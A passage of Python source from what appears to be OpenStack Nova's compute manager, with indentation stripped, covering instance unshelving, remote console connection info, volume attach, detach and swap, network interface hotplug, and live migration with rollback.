instance.task_state = None
instance.save(expected_task_state=[task_states.SHELVING,
task_states.SHELVING_OFFLOADING])
self._delete_scheduler_instance_info(context, instance.uuid)
self._notify_about_instance_usage(context, instance,
'shelve_offload.end')
@wrap_exception()
@reverts_task_state
@wrap_instance_event
@wrap_instance_fault
def unshelve_instance(self, context, instance, image,
filter_properties=None, node=None):
"""Unshelve the instance.
:param context: request context
:param instance: a nova.objects.instance.Instance object
:param image: an image to build from. If None we assume a
volume backed instance.
:param filter_properties: dict containing limits, retry info etc.
:param node: target compute node
"""
if filter_properties is None:
filter_properties = {}
@utils.synchronized(instance.uuid)
def do_unshelve_instance():
self._unshelve_instance(context, instance, image,
filter_properties, node)
do_unshelve_instance()
def _unshelve_instance_key_scrub(self, instance):
"""Remove data from the instance that may cause side effects."""
cleaned_keys = dict(
key_data=instance.key_data,
auto_disk_config=instance.auto_disk_config)
instance.key_data = None
instance.auto_disk_config = False
return cleaned_keys
def _unshelve_instance_key_restore(self, instance, keys):
"""Restore previously scrubbed keys before saving the instance."""
instance.update(keys)
def _unshelve_instance(self, context, instance, image, filter_properties,
node):
self._notify_about_instance_usage(context, instance, 'unshelve.start')
instance.task_state = task_states.SPAWNING
instance.save()
bdms = objects.BlockDeviceMappingList.get_by_instance_uuid(
context, instance.uuid)
block_device_info = self._prep_block_device(context, instance, bdms,
do_check_attach=False)
scrubbed_keys = self._unshelve_instance_key_scrub(instance)
if node is None:
node = self.driver.get_available_nodes()[0]
LOG.debug('No node specified, defaulting to %s', node,
instance=instance)
rt = self._get_resource_tracker(node)
limits = filter_properties.get('limits', {})
if image:
shelved_image_ref = instance.image_ref
instance.image_ref = image['id']
image_meta = image
else:
image_meta = utils.get_image_from_system_metadata(
instance.system_metadata)
self.network_api.setup_instance_network_on_host(context, instance,
self.host)
network_info = self._get_instance_nw_info(context, instance)
try:
with rt.instance_claim(context, instance, limits):
self.driver.spawn(context, instance, image_meta,
injected_files=[],
admin_password=None,
network_info=network_info,
block_device_info=block_device_info)
except Exception:
with excutils.save_and_reraise_exception():
LOG.exception(_LE('Instance failed to spawn'),
instance=instance)
if image:
instance.image_ref = shelved_image_ref
self._delete_snapshot_of_shelved_instance(context, instance,
image['id'])
self._unshelve_instance_key_restore(instance, scrubbed_keys)
self._update_instance_after_spawn(context, instance)
# Delete system_metadata for a shelved instance
compute_utils.remove_shelved_keys_from_system_metadata(instance)
instance.save(expected_task_state=task_states.SPAWNING)
self._update_scheduler_instance_info(context, instance)
self._notify_about_instance_usage(context, instance, 'unshelve.end')
@messaging.expected_exceptions(NotImplementedError)
@wrap_instance_fault
def reset_network(self, context, instance):
"""Reset networking on the given instance."""
LOG.debug('Reset network', context=context, instance=instance)
self.driver.reset_network(instance)
def _inject_network_info(self, context, instance, network_info):
"""Inject network info for the given instance."""
LOG.debug('Inject network info', context=context, instance=instance)
LOG.debug('network_info to inject: |%s|', network_info,
instance=instance)
self.driver.inject_network_info(instance,
network_info)
@wrap_instance_fault
def inject_network_info(self, context, instance):
"""Inject network info, but don't return the info."""
network_info = self._get_instance_nw_info(context, instance)
self._inject_network_info(context, instance, network_info)
@object_compat
@messaging.expected_exceptions(NotImplementedError,
exception.InstanceNotFound)
@wrap_exception()
@wrap_instance_fault
def get_console_output(self, context, instance, tail_length):
"""Send the console output for the given instance."""
context = context.elevated()
LOG.info(_LI("Get console output"), context=context,
instance=instance)
output = self.driver.get_console_output(context, instance)
if tail_length is not None:
output = self._tail_log(output, tail_length)
return output.decode('utf-8', 'replace').encode('ascii', 'replace')
def _tail_log(self, log, length):
try:
length = int(length)
except ValueError:
length = 0
if length == 0:
return ''
else:
return '\n'.join(log.split('\n')[-int(length):])
@object_compat
@messaging.expected_exceptions(exception.ConsoleTypeInvalid,
exception.InstanceNotReady,
exception.InstanceNotFound,
exception.ConsoleTypeUnavailable,
NotImplementedError)
@wrap_exception()
@wrap_instance_fault
def get_vnc_console(self, context, console_type, instance):
"""Return connection information for a vnc console."""
context = context.elevated()
LOG.debug("Getting vnc console", instance=instance)
token = str(uuid.uuid4())
if not CONF.vnc_enabled:
raise exception.ConsoleTypeUnavailable(console_type=console_type)
if console_type == 'novnc':
# For essex, novncproxy_base_url must include the full path
# including the html file (like http://myhost/vnc_auto.html)
access_url = '%s?token=%s' % (CONF.novncproxy_base_url, token)
if CONF.virtualbox.vrde_require_instance_uuid_as_password:
password = instance.uuid
if CONF.virtualbox.vrde_password_length:
password = password[:CONF.virtualbox.vrde_password_length]
access_url = ("%(base_url)s&password=%(password)s" %
{"base_url": access_url, "password": password})
elif console_type == 'xvpvnc':
access_url = '%s?token=%s' % (CONF.xvpvncproxy_base_url, token)
else:
raise exception.ConsoleTypeInvalid(console_type=console_type)
try:
# Retrieve connect info from driver, and then decorate with our
# access info token
console = self.driver.get_vnc_console(context, instance)
connect_info = console.get_connection_info(token, access_url)
except exception.InstanceNotFound:
if instance.vm_state != vm_states.BUILDING:
raise
raise exception.InstanceNotReady(instance_id=instance.uuid)
return connect_info
@object_compat
@messaging.expected_exceptions(exception.ConsoleTypeInvalid,
exception.InstanceNotReady,
exception.InstanceNotFound,
exception.ConsoleTypeUnavailable,
NotImplementedError)
@wrap_exception()
@wrap_instance_fault
def get_spice_console(self, context, console_type, instance):
"""Return connection information for a spice console."""
context = context.elevated()
LOG.debug("Getting spice console", instance=instance)
token = str(uuid.uuid4())
if not CONF.spice.enabled:
raise exception.ConsoleTypeUnavailable(console_type=console_type)
if console_type == 'spice-html5':
# For essex, spicehtml5proxy_base_url must include the full path
# including the html file (like http://myhost/spice_auto.html)
access_url = '%s?token=%s' % (CONF.spice.html5proxy_base_url,
token)
else:
raise exception.ConsoleTypeInvalid(console_type=console_type)
try:
# Retrieve connect info from driver, and then decorate with our
# access info token
console = self.driver.get_spice_console(context, instance)
connect_info = console.get_connection_info(token, access_url)
except exception.InstanceNotFound:
if instance.vm_state != vm_states.BUILDING:
raise
raise exception.InstanceNotReady(instance_id=instance.uuid)
return connect_info
@object_compat
@messaging.expected_exceptions(exception.ConsoleTypeInvalid,
exception.InstanceNotReady,
exception.InstanceNotFound,
exception.ConsoleTypeUnavailable,
NotImplementedError)
@wrap_exception()
@wrap_instance_fault
def get_rdp_console(self, context, console_type, instance):
"""Return connection information for a RDP console."""
context = context.elevated()
LOG.debug("Getting RDP console", instance=instance)
token = str(uuid.uuid4())
if not CONF.rdp.enabled:
raise exception.ConsoleTypeUnavailable(console_type=console_type)
if console_type == 'rdp-html5':
access_url = '%s?token=%s' % (CONF.rdp.html5_proxy_base_url,
token)
else:
raise exception.ConsoleTypeInvalid(console_type=console_type)
try:
# Retrieve connect info from driver, and then decorate with our
# access info token
console = self.driver.get_rdp_console(context, instance)
connect_info = console.get_connection_info(token, access_url)
except exception.InstanceNotFound:
if instance.vm_state != vm_states.BUILDING:
raise
raise exception.InstanceNotReady(instance_id=instance.uuid)
return connect_info
@messaging.expected_exceptions(
exception.ConsoleTypeInvalid,
exception.InstanceNotReady,
exception.InstanceNotFound,
exception.ConsoleTypeUnavailable,
exception.SocketPortRangeExhaustedException,
exception.ImageSerialPortNumberInvalid,
exception.ImageSerialPortNumberExceedFlavorValue,
NotImplementedError)
@wrap_exception()
@wrap_instance_fault
def get_serial_console(self, context, console_type, instance):
"""Returns connection information for a serial console."""
LOG.debug("Getting serial console", instance=instance)
if not CONF.serial_console.enabled:
raise exception.ConsoleTypeUnavailable(console_type=console_type)
context = context.elevated()
token = str(uuid.uuid4())
access_url = '%s?token=%s' % (CONF.serial_console.base_url, token)
try:
# Retrieve connect info from driver, and then decorate with our
# access info token
console = self.driver.get_serial_console(context, instance)
connect_info = console.get_connection_info(token, access_url)
except exception.InstanceNotFound:
if instance.vm_state != vm_states.BUILDING:
raise
raise exception.InstanceNotReady(instance_id=instance.uuid)
return connect_info
@messaging.expected_exceptions(exception.ConsoleTypeInvalid,
exception.InstanceNotReady,
exception.InstanceNotFound)
@object_compat
@wrap_exception()
@wrap_instance_fault
def validate_console_port(self, ctxt, instance, port, console_type):
if console_type == "spice-html5":
console_info = self.driver.get_spice_console(ctxt, instance)
elif console_type == "rdp-html5":
console_info = self.driver.get_rdp_console(ctxt, instance)
elif console_type == "serial":
console_info = self.driver.get_serial_console(ctxt, instance)
else:
console_info = self.driver.get_vnc_console(ctxt, instance)
return console_info.port == port
@object_compat
@wrap_exception()
@reverts_task_state
@wrap_instance_fault
def reserve_block_device_name(self, context, instance, device,
volume_id, disk_bus=None, device_type=None,
return_bdm_object=False):
# NOTE(ndipanov): disk_bus and device_type will be set to None if not
# passed (by older clients) and defaulted by the virt driver. Remove
# default values on the next major RPC version bump.
@utils.synchronized(instance.uuid)
def do_reserve():
bdms = (
objects.BlockDeviceMappingList.get_by_instance_uuid(
context, instance.uuid))
device_name = compute_utils.get_device_name_for_instance(
context, instance, bdms, device)
# NOTE(vish): create bdm here to avoid race condition
bdm = objects.BlockDeviceMapping(
context=context,
source_type='volume', destination_type='volume',
instance_uuid=instance.uuid,
volume_id=volume_id or 'reserved',
device_name=device_name,
disk_bus=disk_bus, device_type=device_type)
bdm.create()
if return_bdm_object:
return bdm
else:
return device_name
return do_reserve()
@object_compat
@wrap_exception()
@reverts_task_state
@wrap_instance_fault
def attach_volume(self, context, volume_id, mountpoint,
instance, bdm=None):
"""Attach a volume to an instance."""
if not bdm:
bdm = objects.BlockDeviceMapping.get_by_volume_id(
context, volume_id)
driver_bdm = driver_block_device.convert_volume(bdm)
@utils.synchronized(instance.uuid)
def do_attach_volume(context, instance, driver_bdm):
try:
return self._attach_volume(context, instance, driver_bdm)
except Exception:
with excutils.save_and_reraise_exception():
bdm.destroy()
do_attach_volume(context, instance, driver_bdm)
def _attach_volume(self, context, instance, bdm):
context = context.elevated()
LOG.info(_LI('Attaching volume %(volume_id)s to %(mountpoint)s'),
{'volume_id': bdm.volume_id,
'mountpoint': bdm['mount_device']},
context=context, instance=instance)
try:
bdm.attach(context, instance, self.volume_api, self.driver,
do_check_attach=False, do_driver_attach=True)
except Exception:
with excutils.save_and_reraise_exception():
LOG.exception(_LE("Failed to attach %(volume_id)s "
"at %(mountpoint)s"),
{'volume_id': bdm.volume_id,
'mountpoint': bdm['mount_device']},
context=context, instance=instance)
self.volume_api.unreserve_volume(context, bdm.volume_id)
info = {'volume_id': bdm.volume_id}
self._notify_about_instance_usage(
context, instance, "volume.attach", extra_usage_info=info)
def _driver_detach_volume(self, context, instance, bdm):
"""Do the actual driver detach using block device mapping."""
mp = bdm.device_name
volume_id = bdm.volume_id
LOG.info(_LI('Detach volume %(volume_id)s from mountpoint %(mp)s'),
{'volume_id': volume_id, 'mp': mp},
context=context, instance=instance)
connection_info = jsonutils.loads(bdm.connection_info)
# NOTE(vish): We currently don't use the serial when disconnecting,
# but added for completeness in case we ever do.
if connection_info and 'serial' not in connection_info:
connection_info['serial'] = volume_id
try:
if not self.driver.instance_exists(instance):
LOG.warning(_LW('Detaching volume from unknown instance'),
context=context, instance=instance)
encryption = encryptors.get_encryption_metadata(
context, self.volume_api, volume_id, connection_info)
self.driver.detach_volume(connection_info,
instance,
mp,
encryption=encryption)
except exception.DiskNotFound as err:
LOG.warning(_LW('Ignoring DiskNotFound exception while detaching '
'volume %(volume_id)s from %(mp)s: %(err)s'),
{'volume_id': volume_id, 'mp': mp, 'err': err},
instance=instance)
except Exception:
with excutils.save_and_reraise_exception():
LOG.exception(_LE('Failed to detach volume %(volume_id)s '
'from %(mp)s'),
{'volume_id': volume_id, 'mp': mp},
context=context, instance=instance)
self.volume_api.roll_detaching(context, volume_id)
def _detach_volume(self, context, volume_id, instance, destroy_bdm=True):
"""Detach a volume from an instance.
:param context: security context
:param volume_id: the volume id
:param instance: the Instance object to detach the volume from
:param destroy_bdm: if True, the corresponding BDM entry will be marked
as deleted. Disabling this is useful for operations
like rebuild, when we don't want to destroy BDM
"""
bdm = objects.BlockDeviceMapping.get_by_volume_id(
context, volume_id)
if CONF.volume_usage_poll_interval > 0:
vol_stats = []
mp = bdm.device_name
# Handle bootable volumes which will not contain /dev/
if '/dev/' in mp:
mp = mp[5:]
try:
vol_stats = self.driver.block_stats(instance, mp)
except NotImplementedError:
pass
if vol_stats:
LOG.debug("Updating volume usage cache with totals",
instance=instance)
rd_req, rd_bytes, wr_req, wr_bytes, flush_ops = vol_stats
self.conductor_api.vol_usage_update(context, volume_id,
rd_req, rd_bytes,
wr_req, wr_bytes,
instance,
update_totals=True)
self._driver_detach_volume(context, instance, bdm)
connector = self.driver.get_volume_connector(instance)
self.volume_api.terminate_connection(context, volume_id, connector)
if destroy_bdm:
bdm.destroy()
info = dict(volume_id=volume_id)
self._notify_about_instance_usage(
context, instance, "volume.detach", extra_usage_info=info)
self.volume_api.detach(context.elevated(), volume_id)
@object_compat
@wrap_exception()
@reverts_task_state
@wrap_instance_fault
def detach_volume(self, context, volume_id, instance):
"""Detach a volume from an instance."""
self._detach_volume(context, volume_id, instance)
def _init_volume_connection(self, context, new_volume_id,
old_volume_id, connector, instance, bdm):
new_cinfo = self.volume_api.initialize_connection(context,
new_volume_id,
connector)
old_cinfo = jsonutils.loads(bdm['connection_info'])
if old_cinfo and 'serial' not in old_cinfo:
old_cinfo['serial'] = old_volume_id
new_cinfo['serial'] = old_cinfo['serial']
return (old_cinfo, new_cinfo)
def _swap_volume(self, context, instance, bdm, connector, old_volume_id,
new_volume_id):
mountpoint = bdm['device_name']
failed = False
new_cinfo = None
resize_to = 0
try:
old_cinfo, new_cinfo = self._init_volume_connection(context,
new_volume_id,
old_volume_id,
connector,
instance,
bdm)
old_vol_size = self.volume_api.get(context, old_volume_id)['size']
new_vol_size = self.volume_api.get(context, new_volume_id)['size']
if new_vol_size > old_vol_size:
resize_to = new_vol_size
self.driver.swap_volume(old_cinfo, new_cinfo, instance, mountpoint,
resize_to)
except Exception:
failed = True
with excutils.save_and_reraise_exception():
if new_cinfo:
msg = _LE("Failed to swap volume %(old_volume_id)s "
"for %(new_volume_id)s")
LOG.exception(msg, {'old_volume_id': old_volume_id,
'new_volume_id': new_volume_id},
context=context,
instance=instance)
else:
msg = _LE("Failed to connect to volume %(volume_id)s "
"with volume at %(mountpoint)s")
LOG.exception(msg, {'volume_id': new_volume_id,
'mountpoint': bdm['device_name']},
context=context,
instance=instance)
self.volume_api.roll_detaching(context, old_volume_id)
self.volume_api.unreserve_volume(context, new_volume_id)
finally:
conn_volume = new_volume_id if failed else old_volume_id
if new_cinfo:
self.volume_api.terminate_connection(context,
conn_volume,
connector)
# If Cinder initiated the swap, it will keep
# the original ID
comp_ret = self.volume_api.migrate_volume_completion(
context,
old_volume_id,
new_volume_id,
error=failed)
return (comp_ret, new_cinfo)
@wrap_exception()
@reverts_task_state
@wrap_instance_fault
def swap_volume(self, context, old_volume_id, new_volume_id, instance):
"""Swap volume for an instance."""
context = context.elevated()
bdm = objects.BlockDeviceMapping.get_by_volume_id(
context, old_volume_id, instance_uuid=instance.uuid)
connector = self.driver.get_volume_connector(instance)
comp_ret, new_cinfo = self._swap_volume(context, instance,
bdm,
connector,
old_volume_id,
new_volume_id)
save_volume_id = comp_ret['save_volume_id']
# Update bdm
values = {
'connection_info': jsonutils.dumps(new_cinfo),
'delete_on_termination': False,
'source_type': 'volume',
'destination_type': 'volume',
'snapshot_id': None,
'volume_id': save_volume_id,
'volume_size': None,
'no_device': None}
bdm.update(values)
bdm.save()
@wrap_exception()
def remove_volume_connection(self, context, volume_id, instance):
"""Remove a volume connection using the volume api."""
# NOTE(vish): We don't want to actually mark the volume
# detached, or delete the bdm, just remove the
# connection from this host.
# NOTE(PhilDay): Can't use object_compat decorator here as
# instance is not the second parameter
if isinstance(instance, dict):
metas = ['metadata', 'system_metadata']
instance = objects.Instance._from_db_object(
context, objects.Instance(), instance,
expected_attrs=metas)
instance._context = context
try:
bdm = objects.BlockDeviceMapping.get_by_volume_id(
context, volume_id)
self._driver_detach_volume(context, instance, bdm)
connector = self.driver.get_volume_connector(instance)
self.volume_api.terminate_connection(context, volume_id, connector)
except exception.NotFound:
pass
@object_compat
@wrap_exception()
@reverts_task_state
@wrap_instance_fault
def attach_interface(self, context, instance, network_id, port_id,
requested_ip):
"""Use hotplug to add an network adapter to an instance."""
network_info = self.network_api.allocate_port_for_instance(
context, instance, port_id, network_id, requested_ip)
if len(network_info) != 1:
LOG.error(_LE('allocate_port_for_instance returned %(ports)s '
'ports'), dict(ports=len(network_info)))
raise exception.InterfaceAttachFailed(
instance_uuid=instance.uuid)
image_ref = instance.get('image_ref')
image_meta = compute_utils.get_image_metadata(
context, self.image_api, image_ref, instance)
try:
self.driver.attach_interface(instance, image_meta, network_info[0])
except exception.NovaException as ex:
port_id = network_info[0].get('id')
LOG.warn(_LW("attach interface failed , try to deallocate "
"port %(port_id)s, reason: %(msg)s"),
{'port_id': port_id, 'msg': ex},
instance=instance)
try:
self.network_api.deallocate_port_for_instance(
context, instance, port_id)
except Exception:
LOG.warn(_LW("deallocate port %(port_id)s failed"),
{'port_id': port_id}, instance=instance)
raise exception.InterfaceAttachFailed(
instance_uuid=instance.uuid)
return network_info[0]
@object_compat
@wrap_exception()
@reverts_task_state
@wrap_instance_fault
def detach_interface(self, context, instance, port_id):
"""Detach an network adapter from an instance."""
network_info = instance.info_cache.network_info
condemned = None
for vif in network_info:
if vif['id'] == port_id:
condemned = vif
break
if condemned is None:
raise exception.PortNotFound(_("Port %s is not "
"attached") % port_id)
try:
self.driver.detach_interface(instance, condemned)
except exception.NovaException as ex:
LOG.warning(_LW("Detach interface failed, port_id=%(port_id)s,"
" reason: %(msg)s"),
{'port_id': port_id, 'msg': ex}, instance=instance)
raise exception.InterfaceDetachFailed(instance_uuid=instance.uuid)
else:
try:
self.network_api.deallocate_port_for_instance(
context, instance, port_id)
except Exception as ex:
with excutils.save_and_reraise_exception():
# Since this is a cast operation, log the failure for
# triage.
LOG.warning(_LW('Failed to deallocate port %(port_id)s '
'for instance. Error: %(error)s'),
{'port_id': port_id, 'error': ex},
instance=instance)
def _get_compute_info(self, context, host):
return objects.ComputeNode.get_first_node_by_host_for_old_compat(
context, host)
@wrap_exception()
def check_instance_shared_storage(self, ctxt, instance, data):
"""Check if the instance files are shared
:param ctxt: security context
:param instance: dict of instance data
:param data: result of driver.check_instance_shared_storage_local
Returns True if instance disks located on shared storage and
False otherwise.
"""
return self.driver.check_instance_shared_storage_remote(ctxt, data)
@wrap_exception()
@wrap_instance_fault
def check_can_live_migrate_destination(self, ctxt, instance,
block_migration, disk_over_commit):
"""Check if it is possible to execute live migration.
This runs checks on the destination host, and then calls
back to the source host to check the results.
:param context: security context
:param instance: dict of instance data
:param block_migration: if true, prepare for block migration
:param disk_over_commit: if true, allow disk over commit
:returns: a dict containing migration info
"""
src_compute_info = obj_base.obj_to_primitive(
self._get_compute_info(ctxt, instance.host))
dst_compute_info = obj_base.obj_to_primitive(
self._get_compute_info(ctxt, CONF.host))
dest_check_data = self.driver.check_can_live_migrate_destination(ctxt,
instance, src_compute_info, dst_compute_info,
block_migration, disk_over_commit)
migrate_data = {}
try:
migrate_data = self.compute_rpcapi.\
check_can_live_migrate_source(ctxt, instance,
dest_check_data)
finally:
self.driver.check_can_live_migrate_destination_cleanup(ctxt,
dest_check_data)
if 'migrate_data' in dest_check_data:
migrate_data.update(dest_check_data['migrate_data'])
return migrate_data
@wrap_exception()
@wrap_instance_fault
def check_can_live_migrate_source(self, ctxt, instance, dest_check_data):
"""Check if it is possible to execute live migration.
This checks if the live migration can succeed, based on the
results from check_can_live_migrate_destination.
:param ctxt: security context
:param instance: dict of instance data
:param dest_check_data: result of check_can_live_migrate_destination
:returns: a dict containing migration info
"""
is_volume_backed = self.compute_api.is_volume_backed_instance(ctxt,
instance)
dest_check_data['is_volume_backed'] = is_volume_backed
block_device_info = self._get_instance_block_device_info(
ctxt, instance, refresh_conn_info=True)
return self.driver.check_can_live_migrate_source(ctxt, instance,
dest_check_data,
block_device_info)
@object_compat
@wrap_exception()
@wrap_instance_fault
def pre_live_migration(self, context, instance, block_migration, disk,
migrate_data):
"""Preparations for live migration at dest host.
:param context: security context
:param instance: dict of instance data
:param block_migration: if true, prepare for block migration
:param migrate_data: if not None, it is a dict which holds data
required for live migration without shared
storage.
"""
block_device_info = self._get_instance_block_device_info(
context, instance, refresh_conn_info=True)
network_info = self._get_instance_nw_info(context, instance)
self._notify_about_instance_usage(
context, instance, "live_migration.pre.start",
network_info=network_info)
pre_live_migration_data = self.driver.pre_live_migration(context,
instance,
block_device_info,
network_info,
disk,
migrate_data)
# NOTE(tr3buchet): setup networks on destination host
self.network_api.setup_networks_on_host(context, instance,
self.host)
# Creating filters to hypervisors and firewalls.
# An example is that nova-instance-instance-xxx,
# which is written to libvirt.xml(Check "virsh nwfilter-list")
# This nwfilter is necessary on the destination host.
# In addition, this method is creating filtering rule
# onto destination host.
self.driver.ensure_filtering_rules_for_instance(instance,
network_info)
self._notify_about_instance_usage(
context, instance, "live_migration.pre.end",
network_info=network_info)
return pre_live_migration_data
@wrap_exception()
@wrap_instance_fault
def live_migration(self, context, dest, instance, block_migration,
migrate_data):
"""Executing live migration.
:param context: security context
:param instance: a nova.objects.instance.Instance object
:param dest: destination host
:param block_migration: if true, prepare for block migration
:param migrate_data: implementation specific params
"""
# NOTE(danms): since instance is not the first parameter, we can't
# use @object_compat on this method. Since this is the only example,
# we do this manually instead of complicating the decorator
if not isinstance(instance, obj_base.NovaObject):
expected = ['metadata', 'system_metadata',
'security_groups', 'info_cache']
instance = objects.Instance._from_db_object(
context, objects.Instance(), instance,
expected_attrs=expected)
# Create a local copy since we'll be modifying the dictionary
migrate_data = dict(migrate_data or {})
try:
if block_migration:
block_device_info = self._get_instance_block_device_info(
context, instance)
disk = self.driver.get_instance_disk_info(
instance, block_device_info=block_device_info)
else:
disk = None
pre_migration_data = self.compute_rpcapi.pre_live_migration(
context, instance,
block_migration, disk, dest, migrate_data)
migrate_data['pre_live_migration_result'] = pre_migration_data
except Exception:
with excutils.save_and_reraise_exception():
LOG.exception(_LE('Pre live migration failed at %s'),
dest, instance=instance)
self._rollback_live_migration(context, instance, dest,
block_migration, migrate_data)
# Executing live migration
# live_migration might raises exceptions, but
# nothing must be recovered in this version.
self.driver.live_migration(context, instance, dest,
self._post_live_migration,
self._rollback_live_migration,
block_migration, migrate_data)
def _live_migration_cleanup_flags(self, block_migration, migrate_data):
"""Determine whether disks or instance path need to be cleaned up after
live migration (at source on success, at destination on rollback)
Block migration needs empty image at destination host before migration
starts, so if any failure occurs, any empty images has to be deleted.
Also Volume backed live migration w/o shared storage needs to delete
newly created instance-xxx dir on the destination as a part of its
rollback process
:param block_migration: if true, it was a block migration
:param migrate_data: implementation specific data
:returns: (bool, bool) -- do_cleanup, destroy_disks
"""
# NOTE(angdraug): block migration wouldn't have been allowed if either
# block storage or instance path were shared
is_shared_block_storage = not block_migration
is_shared_instance_path = not block_migration
if migrate_data:
is_shared_block_storage = migrate_data.get(
'is_shared_block_storage', is_shared_block_storage)
is_shared_instance_path = migrate_data.get(
'is_shared_instance_path', is_shared_instance_path)
# No instance booting at source host, but instance dir
# must be deleted for preparing next block migration
# must be deleted for preparing next live migration w/o shared storage
do_cleanup = block_migration or not is_shared_instance_path
destroy_disks = not is_shared_block_storage
return (do_cleanup, destroy_disks)
@wrap_exception()
@wrap_instance_fault
def _post_live_migration(self, ctxt, instance,
dest, block_migration=False, migrate_data=None):
"""Post operations for live migration.
This method is called from live_migration
and mainly updating database record.
:param ctxt: security context
:param instance: instance dict
:param dest: destination host
:param block_migration: if true, prepare for block migration
:param migrate_data: if not None, it is a dict which has data
required for live migration without shared storage
"""
LOG.info(_LI('_post_live_migration() is started..'),
instance=instance)
bdms = objects.BlockDeviceMappingList.get_by_instance_uuid(
ctxt, instance.uuid)
# Cleanup source host post live-migration
block_device_info = self._get_instance_block_device_info(
ctxt, instance, bdms=bdms)
self.driver.post_live_migration(ctxt, instance, block_device_info,
migrate_data)
# Detaching volumes.
connector = self.driver.get_volume_connector(instance)
for bdm in bdms:
# NOTE(vish): We don't want to actually mark the volume
# detached, or delete the bdm, just remove the
# connection from this host.
# remove the volume connection without detaching from hypervisor
# because the instance is not running anymore on the current host
if bdm.is_volume:
self.volume_api.terminate_connection(ctxt, bdm.volume_id,
connector)
# Releasing vlan.
# (not necessary in current implementation?)
network_info = self._get_instance_nw_info(ctxt, instance)
self._notify_about_instance_usage(ctxt, instance,
"live_migration._post.start",
network_info=network_info)
# Releasing security group ingress rule.
self.driver.unfilter_instance(instance,
network_info)
migration = {'source_compute': self.host,
'dest_compute': dest, }
self.network_api.migrate_instance_start(ctxt,
instance,
migration)
destroy_vifs = False
try:
self.driver.post_live_migration_at_source(ctxt, instance,
network_info)
except NotImplementedError as ex:
LOG.debug(ex, instance=instance)
# For all hypervisors other than libvirt, there is a possibility
# they are unplugging networks from source node in the cleanup
# method
destroy_vifs = True
# Define domain at destination host, without doing it,
# pause/suspend/terminate do not work.
self.compute_rpcapi.post_live_migration_at_destination(ctxt,
instance, block_migration, dest)
do_cleanup, destroy_disks = self._live_migration_cleanup_flags(
block_migration, migrate_data)
if do_cleanup:
self.driver.cleanup(ctxt, instance, network_info,
destroy_disks=destroy_disks,
migrate_data=migrate_data,
destroy_vifs=destroy_vifs)
self.instance_events.clear_events_for_instance(instance)
# NOTE(timello): make sure we update available resources on source
# host even before next periodic task.
self.update_available_resource(ctxt)
self._update_scheduler_instance_info(ctxt, instance)
self._notify_about_instance_usage(ctxt, instance,
"live_migration._post.end",
network_info=network_info)
LOG.info(_LI('Migrating instance to %s finished successfully.'),
dest, instance=instance)
LOG.info(_LI("You may see the error \"libvirt: QEMU error: "
"Domain not found: no domain with matching name.\" "
"This error can be safely ignored."),
instance=instance)
if CONF.vnc_enabled or CONF.spice.enabled or CONF.rdp.enabled:
if CONF.cells.enable:
self.cells_rpcapi.consoleauth_delete_tokens(ctxt,
instance.uuid)
else:
self.consoleauth_rpcapi.delete_tokens_for_instance(ctxt,
instance.uuid)
@object_compat
@wrap_exception()
@wrap_instance_fault
def post_live_migration_at_destination(self, context, instance,
block_migration):
"""Post operations for live migration .
:param context: security context
:param instance: Instance dict
:param block_migration: if true, prepare for block migration
"""
LOG.info(_LI('Post operation of migration started'),
instance=instance)
# NOTE(tr3buchet): setup networks on destination host
# this is called a second time because
# multi_host does not create the bridge in
# plug_vifs
self.network_api.setup_networks_on_host(context, instance,
self.host)
migration = {'source_compute': instance.host,
'dest_compute': self.host, }
self.network_api.migrate_instance_finish(context,
instance,
migration)
network_info = self._get_instance_nw_info(context, instance)
self._notify_about_instance_usage(
context, instance, "live_migration.post.dest.start",
network_info=network_info)
block_device_info = self._get_instance_block_device_info(context,
instance)
self.driver.post_live_migration_at_destination(context, instance,
network_info,
block_migration, block_device_info)
# Restore instance state
current_power_state = self._get_power_state(context, instance)
node_name = None
prev_host = instance.host
try:
compute_node = self._get_compute_info(context, self.host)
node_name = compute_node.hypervisor_hostname
except exception.ComputeHostNotFound:
LOG.exception(_LE('Failed to get compute_info for %s'), self.host)
finally:
instance.host = self.host
instance.power_state = current_power_state
instance.task_state = None
instance.node = node_name
instance.save(expected_task_state=task_states.MIGRATING)
# NOTE(tr3buchet): tear down networks on source host
self.network_api.setup_networks_on_host(context, instance,
prev_host, teardown=True)
# NOTE(vish): this is necessary to update dhcp
self.network_api.setup_networks_on_host(context, instance, self.host)
self._notify_about_instance_usage(
context, instance, "live_migration.post.dest.end",
network_info=network_info)
@wrap_exception()
@wrap_instance_fault
def _rollback_live_migration(self, context, instance,
dest, block_migration, migrate_data=None):
"""Recovers Instance/volume state from migrating -> running.
:param context: security context
:param instance: nova.objects.instance.Instance object
:param dest:
This method is called from live migration src host.
This param specifies destination host.
:param block_migration: if true, prepare for block migration
:param migrate_data:
if not none, contains implementation specific data.
"""
instance.task_state = None
instance.save(expected_task_state=[task_states.MIGRATING])
# NOTE(tr3buchet): setup networks on source host (really it's re-setup)
self.network_api.setup_networks_on_host(context, instance, self.host)
bdms = objects.BlockDeviceMappingList.get_by_instance_uuid(
context, instance.uuid)
for bdm in bdms:
if bdm.is_volume:
self.compute_rpcapi.remove_volume_connection(
context, instance, bdm.volume_id, dest)
self._notify_about_instance_usage(context, instance,
"live_migration._rollback.start")
do_cleanup, destroy_disks = self._live_migration_cleanup_flags(
block_migration, migrate_data)
if do_cleanup:
self.compute_rpcapi.rollback_live_migration_at_destination(
context, instance, dest, destroy_disks=destroy_disks,
migrate_data=migrate_data)
self._notify_about_instance_usage(context, instance,
"live_migration._rollback.end")
@object_compat
@wrap_exception()
@wrap_instance_fault
def rollback_live_migration_at_destination(self, context, instance,
destroy_disks=True,
migrate_data=None):
"""Cleaning up image directory that is created pre_live_migration.
:param context: security context
:param instance: a nova.objects.instance.Instance object sent over rpc
"""
network_info = self._get_instance_nw_info(context, instance)
self._notify_about_instance_usage(
context, instance, "live_migration.rollback.dest.start",
network_info=network_info)
# NOTE(tr3buchet): tear down networks on destination host
self.network_api.setup_networks_on_host(context, instance,
self.host, teardown=True)
# NOTE(vish): The mapping is passed in so the driver can disconnect
# from remote volumes if necessary
block_device_info = self._get_instance_block_device_info(context,
instance)
self.driver.rollback_live_migration_at_destination(
context, instance, network_info, block_device_info,
destroy_disks=destroy_disks, migrate_data=migrate_data)
self._notify_about_instance_usage(
context, instance, "live_migration.rollback.dest.end",
network_info=network_info)
@periodic_task.periodic_task(
spacing=CONF.heal_instance_info_cache_interval)
def _heal_instance_info_cache(self, context):
"""Called periodically. On every call, try to update the
info_cache's network information for another instance by
calling to the network manager.
This is implemented by keeping a cache of uuids of instances
that live on this host. On each call, we pop one off of a
list, pull the DB record, and try the call to the network API.
